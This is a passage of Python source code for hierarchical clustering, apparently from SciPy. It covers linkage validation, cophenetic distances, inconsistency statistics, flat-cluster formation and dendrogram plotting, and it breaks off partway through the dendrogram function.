returned. Otherwise, a tuple (r,d) is returned. ``r`` is a
reference to the root node while ``d`` is a dictionary
mapping cluster ids to ClusterNode references. If a cluster id is
less than n, then it corresponds to a singleton cluster
(leaf node). See ``linkage`` for more information on the
assignment of cluster ids to clusters.
Returns
-------
L : list
The pre-order traversal.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
# The number of original objects is equal to the number of rows minus
# 1.
n = Z.shape[0] + 1
# Create a list full of None's to store the node objects
d = [None] * (n * 2 - 1)
# Create the nodes corresponding to the n original objects.
for i in xrange(0, n):
d[i] = ClusterNode(i)
nd = None
for i in xrange(0, n - 1):
fi = int(Z[i, 0])
fj = int(Z[i, 1])
if fi > i + n:
raise ValueError(('Corrupt matrix Z. Index to derivative cluster '
'is used before it is formed. See row %d, '
'column 0') % fi)
if fj > i + n:
raise ValueError(('Corrupt matrix Z. Index to derivative cluster '
'is used before it is formed. See row %d, '
'column 1') % fj)
nd = ClusterNode(i + n, d[fi], d[fj], Z[i, 2])
# ^ id ^ left ^ right ^ dist
if Z[i, 3] != nd.count:
raise ValueError(('Corrupt matrix Z. The count Z[%d,3] is '
'incorrect.') % i)
d[n + i] = nd
if rd:
return (nd, d)
else:
return nd
def _convert_to_bool(X):
if X.dtype != bool:
X = X.astype(bool)
if not X.flags.contiguous:
X = X.copy()
return X
def _convert_to_double(X):
if X.dtype != np.double:
X = X.astype(np.double)
if not X.flags.contiguous:
X = X.copy()
return X
def cophenet(Z, Y=None):
"""
Calculates the cophenetic distances between each observation in
the hierarchical clustering defined by the linkage ``Z``.
Suppose ``p`` and ``q`` are original observations in
disjoint clusters ``s`` and ``t``, respectively and
``s`` and ``t`` are joined by a direct parent cluster
``u``. The cophenetic distance between observations
``i`` and ``j`` is simply the distance between
clusters ``s`` and ``t``.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as an array
(see ``linkage`` function).
Y : ndarray (optional)
Calculates the cophenetic correlation coefficient ``c`` of a
hierarchical clustering defined by the linkage matrix `Z`
of a set of :math:`n` observations in :math:`m`
dimensions. `Y` is the condensed distance matrix from which
`Z` was generated.
Returns
-------
c : ndarray
The cophentic correlation distance (if ``y`` is passed).
d : ndarray
The cophenetic distance matrix in condensed form. The
:math:`ij` th entry is the cophenetic distance between
original observations :math:`i` and :math:`j`.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
Zs = Z.shape
n = Zs[0] + 1
zz = np.zeros((n * (n - 1)) // 2, dtype=np.double)
# Since the C code does not support striding using strides.
# The dimensions are used instead.
Z = _convert_to_double(Z)
_hierarchy.cophenetic_distances(Z, zz, int(n))
if Y is None:
return zz
Y = np.asarray(Y, order='c')
distance.is_valid_y(Y, throw=True, name='Y')
z = zz.mean()
y = Y.mean()
Yy = Y - y
Zz = zz - z
numerator = (Yy * Zz)
denomA = Yy ** 2
denomB = Zz ** 2
c = numerator.sum() / np.sqrt((denomA.sum() * denomB.sum()))
return (c, zz)
def inconsistent(Z, d=2):
"""
Calculates inconsistency statistics on a linkage.
Note: This function behaves similarly to the MATLAB(TM)
inconsistent function.
Parameters
----------
Z : ndarray
The :math:`(n-1)` by 4 matrix encoding the linkage
(hierarchical clustering). See ``linkage`` documentation
for more information on its form.
d : int, optional
The number of links up to `d` levels below each
non-singleton cluster.
Returns
-------
R : ndarray
A :math:`(n-1)` by 5 matrix where the ``i``'th row
contains the link statistics for the non-singleton cluster
``i``. The link statistics are computed over the link
heights for links :math:`d` levels below the cluster
``i``. ``R[i,0]`` and ``R[i,1]`` are the mean and standard
deviation of the link heights, respectively; ``R[i,2]`` is
the number of links included in the calculation; and
``R[i,3]`` is the inconsistency coefficient,
.. math:: \\frac{\\mathtt{Z[i,2]}-\\mathtt{R[i,0]}} {R[i,1]}
"""
Z = np.asarray(Z, order='c')
Zs = Z.shape
is_valid_linkage(Z, throw=True, name='Z')
if (not d == np.floor(d)) or d < 0:
raise ValueError('The second argument d must be a nonnegative '
'integer value.')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[Z] = _copy_arrays_if_base_present([Z])
n = Zs[0] + 1
R = np.zeros((n - 1, 4), dtype=np.double)
_hierarchy.inconsistent(Z, R, int(n), int(d))
return R
def from_mlab_linkage(Z):
"""
Converts a linkage matrix generated by MATLAB(TM) to a new
linkage matrix compatible with this module.
The conversion does two things:
* the indices are converted from ``1..N`` to ``0..(N-1)`` form,
and
* a fourth column Z[:,3] is added where Z[i,3] is represents the
number of original observations (leaves) in the non-singleton
cluster i.
This function is useful when loading in linkages from legacy data
files generated by MATLAB.
Parameters
----------
Z : ndarray
A linkage matrix generated by MATLAB(TM).
Returns
-------
ZS : ndarray
A linkage matrix compatible with this library.
"""
Z = np.asarray(Z, dtype=np.double, order='c')
Zs = Z.shape
# If it's empty, return it.
if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):
return Z.copy()
if len(Zs) != 2:
raise ValueError("The linkage array must be rectangular.")
# If it contains no rows, return it.
if Zs[0] == 0:
return Z.copy()
Zpart = Z.copy()
if Zpart[:, 0:2].min() != 1.0 and Zpart[:, 0:2].max() != 2 * Zs[0]:
raise ValueError('The format of the indices is not 1..N')
Zpart[:, 0:2] -= 1.0
CS = np.zeros((Zs[0],), dtype=np.double)
_hierarchy.calculate_cluster_sizes(Zpart, CS, int(Zs[0]) + 1)
return np.hstack([Zpart, CS.reshape(Zs[0], 1)])
def to_mlab_linkage(Z):
"""
Converts a linkage matrix to a MATLAB(TM) compatible one.
Converts a linkage matrix ``Z`` generated by the linkage function
of this module to a MATLAB(TM) compatible one. The return linkage
matrix has the last column removed and the cluster indices are
converted to ``1..N`` indexing.
Parameters
----------
Z : ndarray
A linkage matrix generated by this library.
Returns
-------
to_mlab_linkage : ndarray
A linkage matrix compatible with MATLAB(TM)'s hierarchical
clustering functions.
The return linkage matrix has the last column removed
and the cluster indices are converted to ``1..N`` indexing.
"""
Z = np.asarray(Z, order='c', dtype=np.double)
Zs = Z.shape
if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):
return Z.copy()
is_valid_linkage(Z, throw=True, name='Z')
ZP = Z[:, 0:3].copy()
ZP[:, 0:2] += 1.0
return ZP
def is_monotonic(Z):
"""
Returns True if the linkage passed is monotonic.
The linkage is monotonic if for every cluster :math:`s` and :math:`t`
joined, the distance between them is no less than the distance
between any previously joined clusters.
Parameters
----------
Z : ndarray
The linkage matrix to check for monotonicity.
Returns
-------
b : bool
A boolean indicating whether the linkage is monotonic.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
# We expect the i'th value to be greater than its successor.
return (Z[1:, 2] >= Z[:-1, 2]).all()
def is_valid_im(R, warning=False, throw=False, name=None):
"""Returns True if the inconsistency matrix passed is valid.
It must be a :math:`n` by 4 numpy array of doubles. The standard
deviations ``R[:,1]`` must be nonnegative. The link counts
``R[:,2]`` must be positive and no greater than :math:`n-1`.
Parameters
----------
R : ndarray
The inconsistency matrix to check for validity.
warning : bool, optional
When True, issues a Python warning if the linkage
matrix passed is invalid.
throw : bool, optional
When True, throws a Python exception if the linkage
matrix passed is invalid.
name : str, optional
This string refers to the variable name of the invalid
linkage matrix.
Returns
-------
b : bool
True if the inconsistency matrix is valid.
"""
R = np.asarray(R, order='c')
valid = True
name_str = "%r " % name if name else ''
try:
if type(R) != np.ndarray:
raise TypeError('Variable %spassed as inconsistency matrix is not '
'a numpy array.' % name_str)
if R.dtype != np.double:
raise TypeError('Inconsistency matrix %smust contain doubles '
'(double).' % name_str)
if len(R.shape) != 2:
raise ValueError('Inconsistency matrix %smust have shape=2 (i.e. '
'be two-dimensional).' % name_str)
if R.shape[1] != 4:
raise ValueError('Inconsistency matrix %smust have 4 columns.' %
name_str)
if R.shape[0] < 1:
raise ValueError('Inconsistency matrix %smust have at least one '
'row.' % name_str)
if (R[:, 0] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'height means.' % name_str)
if (R[:, 1] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'height standard deviations.' % name_str)
if (R[:, 2] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'counts.' % name_str)
except Exception as e:
if throw:
raise
if warning:
_warning(str(e))
valid = False
return valid
def is_valid_linkage(Z, warning=False, throw=False, name=None):
"""
Checks the validity of a linkage matrix.
A linkage matrix is valid if it is a two dimensional
ndarray (type double) with :math:`n`
rows and 4 columns. The first two columns must contain indices
between 0 and :math:`2n-1`. For a given row ``i``,
:math:`0 \\leq \\mathtt{Z[i,0]} \\leq i+n-1`
and :math:`0 \\leq Z[i,1] \\leq i+n-1`
(i.e. a cluster cannot join another cluster unless the cluster
being joined has been generated.)
Parameters
----------
Z : array_like
Linkage matrix.
warning : bool, optional
When True, issues a Python warning if the linkage
matrix passed is invalid.
throw : bool, optional
When True, throws a Python exception if the linkage
matrix passed is invalid.
name : str, optional
This string refers to the variable name of the invalid
linkage matrix.
Returns
-------
b : bool
True iff the inconsistency matrix is valid.
"""
Z = np.asarray(Z, order='c')
valid = True
name_str = "%r " % name if name else ''
try:
if type(Z) != np.ndarray:
raise TypeError('Passed linkage argument %sis not a valid array.' %
name_str)
if Z.dtype != np.double:
raise TypeError('Linkage matrix %smust contain doubles.' % name_str)
if len(Z.shape) != 2:
raise ValueError('Linkage matrix %smust have shape=2 (i.e. be '
'two-dimensional).' % name_str)
if Z.shape[1] != 4:
raise ValueError('Linkage matrix %smust have 4 columns.' % name_str)
if Z.shape[0] == 0:
raise ValueError('Linkage must be computed on at least two '
'observations.')
n = Z.shape[0]
if n > 1:
if ((Z[:, 0] < 0).any() or (Z[:, 1] < 0).any()):
raise ValueError('Linkage %scontains negative indices.' %
name_str)
if (Z[:, 2] < 0).any():
raise ValueError('Linkage %scontains negative distances.' %
name_str)
if (Z[:, 3] < 0).any():
raise ValueError('Linkage %scontains negative counts.' %
name_str)
if _check_hierarchy_uses_cluster_before_formed(Z):
raise ValueError('Linkage %suses non-singleton cluster before '
'it is formed.' % name_str)
if _check_hierarchy_uses_cluster_more_than_once(Z):
raise ValueError('Linkage %suses the same cluster more than once.'
% name_str)
except Exception as e:
if throw:
raise
if warning:
_warning(str(e))
valid = False
return valid
def _check_hierarchy_uses_cluster_before_formed(Z):
n = Z.shape[0] + 1
for i in xrange(0, n - 1):
if Z[i, 0] >= n + i or Z[i, 1] >= n + i:
return True
return False
def _check_hierarchy_uses_cluster_more_than_once(Z):
n = Z.shape[0] + 1
chosen = set([])
for i in xrange(0, n - 1):
if (Z[i, 0] in chosen) or (Z[i, 1] in chosen) or Z[i, 0] == Z[i, 1]:
return True
chosen.add(Z[i, 0])
chosen.add(Z[i, 1])
return False
def _check_hierarchy_not_all_clusters_used(Z):
n = Z.shape[0] + 1
chosen = set([])
for i in xrange(0, n - 1):
chosen.add(int(Z[i, 0]))
chosen.add(int(Z[i, 1]))
must_chosen = set(range(0, 2 * n - 2))
return len(must_chosen.difference(chosen)) > 0
def num_obs_linkage(Z):
"""
Returns the number of original observations of the linkage matrix
passed.
Parameters
----------
Z : ndarray
The linkage matrix on which to perform the operation.
Returns
-------
n : int
The number of original observations in the linkage.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
return (Z.shape[0] + 1)
def correspond(Z, Y):
"""
Checks for correspondence between linkage and condensed distance matrices
They must have the same number of original observations for
the check to succeed.
This function is useful as a sanity check in algorithms that make
extensive use of linkage and distance matrices that must
correspond to the same set of original observations.
Parameters
----------
Z : array_like
The linkage matrix to check for correspondence.
Y : array_like
The condensed distance matrix to check for correspondence.
Returns
-------
b : bool
A boolean indicating whether the linkage matrix and distance
matrix could possibly correspond to one another.
"""
is_valid_linkage(Z, throw=True)
distance.is_valid_y(Y, throw=True)
Z = np.asarray(Z, order='c')
Y = np.asarray(Y, order='c')
return distance.num_obs_y(Y) == num_obs_linkage(Z)
def fcluster(Z, t, criterion='inconsistent', depth=2, R=None, monocrit=None):
"""
Forms flat clusters from the hierarchical clustering defined by
the linkage matrix ``Z``.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded with the matrix returned
by the `linkage` function.
t : float
The threshold to apply when forming flat clusters.
criterion : str, optional
The criterion to use in forming flat clusters. This can
be any of the following values:
``inconsistent`` : If a cluster node and all its
descendants have an inconsistent value less than or equal
to `t` then all its leaf descendants belong to the
same flat cluster. When no non-singleton cluster meets
this criterion, every node is assigned to its own
cluster. (Default)
``distance`` : Forms flat clusters so that the original
observations in each flat cluster have no greater a
cophenetic distance than `t`.
``maxclust`` : Finds a minimum threshold ``r`` so that
the cophenetic distance between any two original
observations in the same flat cluster is no more than
``r`` and no more than `t` flat clusters are formed.
``monocrit`` : Forms a flat cluster from a cluster node c
with index i when ``monocrit[j] <= t``.
For example, to threshold on the maximum mean distance
as computed in the inconsistency matrix R with a
threshold of 0.8 do:
MR = maxRstat(Z, R, 3)
cluster(Z, t=0.8, criterion='monocrit', monocrit=MR)
``maxclust_monocrit`` : Forms a flat cluster from a
non-singleton cluster node ``c`` when ``monocrit[i] <=
r`` for all cluster indices ``i`` below and including
``c``. ``r`` is minimized such that no more than ``t``
flat clusters are formed. monocrit must be
monotonic. For example, to minimize the threshold t on
maximum inconsistency values so that no more than 3 flat
clusters are formed, do:
MI = maxinconsts(Z, R)
cluster(Z, t=3, criterion='maxclust_monocrit', monocrit=MI)
depth : int, optional
The maximum depth to perform the inconsistency calculation.
It has no meaning for the other criteria. Default is 2.
R : ndarray, optional
The inconsistency matrix to use for the 'inconsistent'
criterion. This matrix is computed if not provided.
monocrit : ndarray, optional
An array of length n-1. `monocrit[i]` is the
statistics upon which non-singleton i is thresholded. The
monocrit vector must be monotonic, i.e. given a node c with
index i, for all node indices j corresponding to nodes
below c, `monocrit[i] >= monocrit[j]`.
Returns
-------
fcluster : ndarray
An array of length n. T[i] is the flat cluster number to
which original observation i belongs.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
T = np.zeros((n,), dtype='i')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[Z] = _copy_arrays_if_base_present([Z])
if criterion == 'inconsistent':
if R is None:
R = inconsistent(Z, depth)
else:
R = np.asarray(R, order='c')
is_valid_im(R, throw=True, name='R')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[R] = _copy_arrays_if_base_present([R])
_hierarchy.cluster_in(Z, R, T, float(t), int(n))
elif criterion == 'distance':
_hierarchy.cluster_dist(Z, T, float(t), int(n))
elif criterion == 'maxclust':
_hierarchy.cluster_maxclust_dist(Z, T, int(n), int(t))
elif criterion == 'monocrit':
[monocrit] = _copy_arrays_if_base_present([monocrit])
_hierarchy.cluster_monocrit(Z, monocrit, T, float(t), int(n))
elif criterion == 'maxclust_monocrit':
[monocrit] = _copy_arrays_if_base_present([monocrit])
_hierarchy.cluster_maxclust_monocrit(Z, monocrit, T, int(n), int(t))
else:
raise ValueError('Invalid cluster formation criterion: %s'
% str(criterion))
return T
def fclusterdata(X, t, criterion='inconsistent',
metric='euclidean', depth=2, method='single', R=None):
"""
Cluster observation data using a given metric.
Clusters the original observations in the n-by-m data
matrix X (n observations in m dimensions), using the euclidean
distance metric to calculate distances between original observations,
performs hierarchical clustering using the single linkage algorithm,
and forms flat clusters using the inconsistency method with `t` as the
cut-off threshold.
A one-dimensional array T of length n is returned. T[i] is the index
of the flat cluster to which the original observation i belongs.
Parameters
----------
X : (N, M) ndarray
N by M data matrix with N observations in M dimensions.
t : float
The threshold to apply when forming flat clusters.
criterion : str, optional
Specifies the criterion for forming flat clusters. Valid
values are 'inconsistent' (default), 'distance', or 'maxclust'
cluster formation algorithms. See `fcluster` for descriptions.
metric : str, optional
The distance metric for calculating pairwise distances. See
`distance.pdist` for descriptions and linkage to verify
compatibility with the linkage method.
depth : int, optional
The maximum depth for the inconsistency calculation. See
`inconsistent` for more information.
method : str, optional
The linkage method to use (single, complete, average,
weighted, median centroid, ward). See `linkage` for more
information. Default is "single".
R : ndarray, optional
The inconsistency matrix. It will be computed if necessary
if it is not passed.
Returns
-------
fclusterdata : ndarray
A vector of length n. T[i] is the flat cluster number to
which original observation i belongs.
Notes
-----
This function is similar to the MATLAB function clusterdata.
"""
X = np.asarray(X, order='c', dtype=np.double)
if type(X) != np.ndarray or len(X.shape) != 2:
raise TypeError('The observation matrix X must be an n by m numpy '
'array.')
Y = distance.pdist(X, metric=metric)
Z = linkage(Y, method=method)
if R is None:
R = inconsistent(Z, d=depth)
else:
R = np.asarray(R, order='c')
T = fcluster(Z, criterion=criterion, depth=depth, R=R, t=t)
return T
def leaves_list(Z):
"""
Returns a list of leaf node ids
The return corresponds to the observation vector index as it appears
in the tree from left to right. Z is a linkage matrix.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. `Z` is
a linkage matrix. See ``linkage`` for more information.
Returns
-------
leaves_list : ndarray
The list of leaf node ids.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
ML = np.zeros((n,), dtype='i')
[Z] = _copy_arrays_if_base_present([Z])
_hierarchy.prelist(Z, ML, int(n))
return ML
# Maps number of leaves to text size.
#
# p <= 20, size="12"
# 20 < p <= 30, size="10"
# 30 < p <= 50, size="8"
# 50 < p <= np.inf, size="6"
_dtextsizes = {20: 12, 30: 10, 50: 8, 85: 6, np.inf: 5}
_drotation = {20: 0, 40: 45, np.inf: 90}
_dtextsortedkeys = list(_dtextsizes.keys())
_dtextsortedkeys.sort()
_drotationsortedkeys = list(_drotation.keys())
_drotationsortedkeys.sort()
def _remove_dups(L):
"""
Removes duplicates AND preserves the original order of the elements.
The set class is not guaranteed to do this.
"""
seen_before = set([])
L2 = []
for i in L:
if i not in seen_before:
seen_before.add(i)
L2.append(i)
return L2
def _get_tick_text_size(p):
for k in _dtextsortedkeys:
if p <= k:
return _dtextsizes[k]
def _get_tick_rotation(p):
for k in _drotationsortedkeys:
if p <= k:
return _drotation[k]
def _plot_dendrogram(icoords, dcoords, ivl, p, n, mh, orientation,
no_labels, color_list, leaf_font_size=None,
leaf_rotation=None, contraction_marks=None,
ax=None, above_threshold_color='b'):
# Import matplotlib here so that it's not imported unless dendrograms
# are plotted. Raise an informative error if importing fails.
try:
# if an axis is provided, don't use pylab at all
if ax is None:
import matplotlib.pylab
import matplotlib.patches
import matplotlib.collections
except ImportError:
raise ImportError("You must install the matplotlib library to plot the dendrogram. Use no_plot=True to calculate the dendrogram without plotting.")
if ax is None:
ax = matplotlib.pylab.gca()
# if we're using pylab, we want to trigger a draw at the end
trigger_redraw = True
else:
trigger_redraw = False
# Independent variable plot width
ivw = len(ivl) * 10
# Depenendent variable plot height
dvw = mh + mh * 0.05
ivticks = np.arange(5, len(ivl) * 10 + 5, 10)
if orientation == 'top':
ax.set_ylim([0, dvw])
ax.set_xlim([0, ivw])
xlines = icoords
ylines = dcoords
if no_labels:
ax.set_xticks([])
ax.set_xticklabels([])
else:
ax.set_xticks(ivticks)
ax.set_xticklabels(ivl)
ax.xaxis.set_ticks_position('bottom')
lbls = ax.get_xticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
else:
leaf_rot = float(_get_tick_rotation(len(ivl)))
for lbl in lbls:
lbl.set_rotation(leaf_rot)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
else:
leaf_fs = float(_get_tick_text_size(len(ivl)))
for lbl in lbls:
lbl.set_size(leaf_fs)
# Make the tick marks invisible because they cover up the links
for line in ax.get_xticklines():
line.set_visible(False)
elif orientation == 'bottom':
ax.set_ylim([dvw, 0])
ax.set_xlim([0, ivw])
xlines = icoords
ylines = dcoords
if no_labels:
ax.set_xticks([])
ax.set_xticklabels([])
else:
ax.set_xticks(ivticks)
ax.set_xticklabels(ivl)
lbls = ax.get_xticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
else:
leaf_rot = float(_get_tick_rotation(p))
for lbl in lbls:
lbl.set_rotation(leaf_rot)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
else:
leaf_fs = float(_get_tick_text_size(p))
for lbl in lbls:
lbl.set_size(leaf_fs)
ax.xaxis.set_ticks_position('top')
# Make the tick marks invisible because they cover up the links
for line in ax.get_xticklines():
line.set_visible(False)
elif orientation == 'left':
ax.set_xlim([0, dvw])
ax.set_ylim([0, ivw])
xlines = dcoords
ylines = icoords
if no_labels:
ax.set_yticks([])
ax.set_yticklabels([])
else:
ax.set_yticks(ivticks)
ax.set_yticklabels(ivl)
lbls = ax.get_yticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
ax.yaxis.set_ticks_position('left')
# Make the tick marks invisible because they cover up the
# links
for line in ax.get_yticklines():
line.set_visible(False)
elif orientation == 'right':
ax.set_xlim([dvw, 0])
ax.set_ylim([0, ivw])
xlines = dcoords
ylines = icoords
if no_labels:
ax.set_yticks([])
ax.set_yticklabels([])
else:
ax.set_yticks(ivticks)
ax.set_yticklabels(ivl)
lbls = ax.get_yticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
ax.yaxis.set_ticks_position('right')
# Make the tick marks invisible because they cover up the links
for line in ax.get_yticklines():
line.set_visible(False)
# Let's use collections instead. This way there is a separate legend
# item for each tree grouping, rather than stupidly one for each line
# segment.
colors_used = _remove_dups(color_list)
color_to_lines = {}
for color in colors_used:
color_to_lines[color] = []
for (xline, yline, color) in zip(xlines, ylines, color_list):
color_to_lines[color].append(list(zip(xline, yline)))
colors_to_collections = {}
# Construct the collections.
for color in colors_used:
coll = matplotlib.collections.LineCollection(color_to_lines[color],
colors=(color,))
colors_to_collections[color] = coll
# Add all the groupings below the color threshold.
for color in colors_used:
if color != above_threshold_color:
ax.add_collection(colors_to_collections[color])
# If there is a grouping of links above the color threshold,
# it should go last.
if above_threshold_color in colors_to_collections:
ax.add_collection(colors_to_collections[above_threshold_color])
if contraction_marks is not None:
if orientation in ('left', 'right'):
for (x, y) in contraction_marks:
e = matplotlib.patches.Ellipse((y, x),
width=dvw / 100, height=1.0)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(0.5)
e.set_facecolor('k')
if orientation in ('top', 'bottom'):
for (x, y) in contraction_marks:
e = matplotlib.patches.Ellipse((x, y),
width=1.0, height=dvw / 100)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(0.5)
e.set_facecolor('k')
if trigger_redraw:
matplotlib.pylab.draw_if_interactive()
_link_line_colors = ['g', 'r', 'c', 'm', 'y', 'k']
def set_link_color_palette(palette):
"""
Set list of matplotlib color codes for dendrogram color_threshold.
Parameters
----------
palette : list
A list of matplotlib color codes. The order of
the color codes is the order in which the colors are cycled
through when color thresholding in the dendrogram.
"""
if type(palette) not in (list, tuple):
raise TypeError("palette must be a list or tuple")
_ptypes = [isinstance(p, string_types) for p in palette]
if False in _ptypes:
raise TypeError("all palette list elements must be color strings")
for i in list(_link_line_colors):
_link_line_colors.remove(i)
_link_line_colors.extend(list(palette))
def dendrogram(Z, p=30, truncate_mode=None, color_threshold=None,
get_leaves=True, orientation='top', labels=None,
count_sort=False, distance_sort=False, show_leaf_counts=True,
no_plot=False, no_labels=False, color_list=None,
leaf_font_size=None, leaf_rotation=None, leaf_label_func=None,
no_leaves=False, show_contracted=False,
link_color_func=None, ax=None, above_threshold_color='b'):
"""
Plots the hierarchical clustering as a dendrogram.
The dendrogram illustrates how each cluster is
composed by drawing a U-shaped link between a non-singleton
cluster and its children. The height of the top of the U-link is
the distance between its children clusters. It is also the
cophenetic distance between original observations in the two
children clusters. It is expected that the distances in Z[:,2] be
monotonic, otherwise crossings appear in the dendrogram.
Parameters
----------
Z : ndarray
The linkage matrix encoding the hierarchical clustering to
render as a dendrogram. See the ``linkage`` function for more
information on the format of ``Z``.
p : int, optional
The ``p`` parameter for ``truncate_mode``.
truncate_mode : str, optional
The dendrogram can be hard to read when the original
observation matrix from which the linkage is derived is
large. Truncation is used to condense the dendrogram. There
are several modes:
``None/'none'``
No truncation is performed (Default).
``'lastp'``
The last ``p`` non-singleton formed in the linkage are the only
non-leaf nodes in the linkage; they correspond to rows
``Z[n-p-2:end]`` in ``Z``. All other non-singleton clusters are
contracted into leaf nodes.
``'mlab'``
This corresponds to MATLAB(TM) behavior. (not implemented yet)
``'level'/'mtica'``
No more than ``p`` levels of the dendrogram tree are displayed.
This corresponds to Mathematica(TM) behavior.
color_threshold : double, optional
For brevity, let :math:`t` be the ``color_threshold``.
Colors all the descendent links below a cluster node
:math:`k` the same color if :math:`k` is the first node below
the cut threshold :math:`t`. All links connecting nodes with
distances greater than or equal to the threshold are colored
blue. If :math:`t` is less than or equal to zero, all nodes
are colored blue. If ``color_threshold`` is None or
'default', corresponding with MATLAB(TM) behavior, the
threshold is set to ``0.7*max(Z[:,2])``.
get_leaves : bool, optional
Includes a list ``R['leaves']=H`` in the result
dictionary. For each :math:`i`, ``H[i] == j``, cluster node
``j`` appears in position ``i`` in the left-to-right traversal
of the leaves, where :math:`j < 2n-1` and :math:`i < n`.
orientation : str, optional
The direction to plot the dendrogram, which can be any
of the following strings:
``'top'``
Plots the root at the top, and plot descendent links going downwards.
(default).
``'bottom'``
Plots the root at the bottom, and plot descendent links going
upwards.
``'left'``
Plots the root at the left, and plot descendent links going right.
``'right'``
Plots the root at the right, and plot descendent links going left.
labels : ndarray, optional
By default ``labels`` is None so the index of the original observation
is used to label the leaf nodes. Otherwise, this is an :math:`n`
-sized list (or tuple). The ``labels[i]`` value is the text to put
under the :math:`i` th leaf node only if it corresponds to an original
observation and not a non-singleton cluster.
count_sort : str or bool, optional
For each node n, the order (visually, from left-to-right) n's
two descendent links are plotted is determined by this
parameter, which can be any of the following values:
``False``
Nothing is done.
``'ascending'`` or ``True``
The child with the minimum number of original objects in its cluster
is plotted first.
``'descendent'``
The child with the maximum number of original objects in its cluster
is plotted first.
Note ``distance_sort`` and ``count_sort`` cannot both be True.
distance_sort : str or bool, optional
For each node n, the order (visually, from left-to-right) n's
two descendent links are plotted is determined by this
parameter, which can be any of the following values:
``False``
Nothing is done.
``'ascending'`` or ``True``
The child with the minimum distance between its direct descendents is
plotted first.
``'descending'``
The child with the maximum distance between its direct descendents is
plotted first.
Note ``distance_sort`` and ``count_sort`` cannot both be True.
show_leaf_counts : bool, optional
When True, leaf nodes representing :math:`k>1` original
observation are labeled with the number of observations they
contain in parentheses.
no_plot : bool, optional
When True, the final rendering is not performed. This is
useful if only the data structures computed for the rendering
are needed or if matplotlib is not available.
no_labels : bool, optional
When True, no labels appear next to the leaf nodes in the
rendering of the dendrogram.
leaf_rotation : double, optional
Specifies the angle (in degrees) to rotate the leaf
labels. When unspecified, the rotation is based on the number of
nodes in the dendrogram (default is 0).
leaf_font_size : int, optional
Specifies the font size (in points) of the leaf labels. When
unspecified, the size based on the number of nodes in the
dendrogram.
leaf_label_func : lambda or function, optional
When leaf_label_func is a callable function, for each
leaf with cluster index :math:`k < 2n-1`. The function
is expected to return a string with the label for the
leaf.
Indices :math:`k < n` correspond to original observations
while indices :math:`k \\geq n` correspond to non-singleton
clusters.
For example, to label singletons with their node id and
non-singletons with their id, count, and inconsistency
coefficient, simply do::
# First define the leaf label function.
def llf(id):
if id < n:
return str(id)
else:
return '[%d %d %1.2f]' % (id, count, R[n-id,3])
# The text for the leaf nodes is going to be big so force
# a rotation of 90 degrees.
dendrogram(Z, leaf_label_func=llf, leaf_rotation=90)
show_contracted : bool, optional
When True the heights of non-singleton nodes contracted
into a leaf node are plotted as crosses along the link
connecting that leaf node. This really is only useful when
truncation is used (see ``truncate_mode`` parameter).
link_color_func : callable, optional
If given, `link_color_function` is called with each non-singleton id
corresponding to each U-shaped link it will paint. The function is
expected to return the color to paint the link, encoded as a matplotlib
color string code. For example::
dendrogram(Z, link_color_func=lambda k: colors[k])
colors the direct links below each untruncated non-singleton node
``k`` using ``colors[k]``.
ax : matplotlib Axes instance, optional
If None and `no_plot` is not True, the dendrogram will be plotted
on the current axes. Otherwise if `no_plot` is not True the
dendrogram will be plotted on the given ``Axes`` instance. This can be
useful if the dendrogram is part of a more complex figure.
above_threshold_color : str, optional
This matplotlib color string sets the color of the links above the
color_threshold. The default is 'b'.
Returns
-------
R : dict
A dictionary of data structures computed to render the
dendrogram. Its has the following keys:
``'color_list'``
A list of color names. The k'th element represents the color of the
k'th link.
``'icoord'`` and ``'dcoord'``
Each of them is a list of lists. Let ``icoord = [I1, I2, ..., Ip]``
where ``Ik = [xk1, xk2, xk3, xk4]`` and ``dcoord = [D1, D2, ..., Dp]``
where ``Dk = [yk1, yk2, yk3, yk4]``, then the k'th link painted is
``(xk1, yk1)`` - ``(xk2, yk2)`` - ``(xk3, yk3)`` - ``(xk4, yk4)``.
``'ivl'``
A list of labels corresponding to the leaf nodes.
``'leaves'``
For each i, ``H[i] == j``, cluster node ``j`` appears in position
``i`` in the left-to-right traversal of the leaves, where
:math:`j < 2n-1` and :math:`i < n`. If ``j`` is less than ``n``, the
``i``-th leaf node corresponds to an original observation.
Otherwise, it corresponds to a non-singleton cluster.
"""
# Features under consideration.
#
# ... = dendrogram(..., leaves_order=None)
#
# Plots the leaves in the order specified by a vector of
# original observation indices. If the vector contains duplicates
# or results in a crossing, an exception will be thrown. Passing
# None orders leaf nodes based on the order they appear in the
# pre-order traversal.
Z = np.asarray(Z, order='c')
if orientation not in ["top", "left", "bottom", "right"]:
